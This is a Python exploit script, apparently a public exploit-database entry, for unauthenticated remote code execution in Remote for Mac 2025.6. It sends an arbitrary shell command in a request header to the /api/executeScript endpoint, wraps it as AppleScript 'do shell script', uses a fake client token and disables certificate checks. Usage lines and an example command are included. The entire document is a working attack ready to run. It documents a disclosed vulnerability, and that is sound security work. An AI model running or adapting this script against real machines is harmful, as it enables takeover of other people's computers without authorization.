# Exploit Title: Remote for Mac 2025.6 - Unauthenticated # Exploit Title: Remote for Mac 2025.6 - Unauthenticated RCE
# Date: 2025-05-26
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://cherpake.com/
# Software Link: https://cherpake.com/latest.php?os=mac
# Version: 2025.6
# Tested on: macOS Mojave 10.14.6
#!/usr/bin/env python3
'''

Description:

- Exploits the executeScript API endpoint in Remote for Mac application
- Works when "Allow unknown devices" setting is enabled (default: disabled)


Vulnerable Component:
- /api/executeScript endpoint with missing authentication checks

Usage: python3 exploit.py <target_ip> <port> "<command>"
Example: python3 exploit.py 192.168.1.100 443 "whoami"

'''

import requests
import sys
import json
from urllib3.exceptions import InsecureRequestWarning

# Disable SSL warnings
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

if len(sys.argv) < 4:
print(f"Usage: {sys.argv[0]} <IP> <PORT> <COMMAND>")
print(f"Example: {sys.argv[0]} 192.168.1.100 443 \"whoami\"")
sys.exit(1)

ip = sys.argv[1]
port = sys.argv[2]
cmd = " ".join(sys.argv[3:])

try:
response = requests.get(
f"https://{ip}:{port}/api/executeScript",
headers={
"X-ClientToken": "1337",
"X-HostName": "apple iMac",
"X-HostFullModel": "iMac17,1",
"X-Script": f"do shell script \"{cmd}\"",
"X-ScriptName": "exploit",
"X-ScriptDelay": "0"
},
verify=False,
timeout=10
)

result = json.loads(response.text)
print(result.get("result", "No output").strip())

except Exception as e:
print(f"Error: {e}")
sys.exit(1)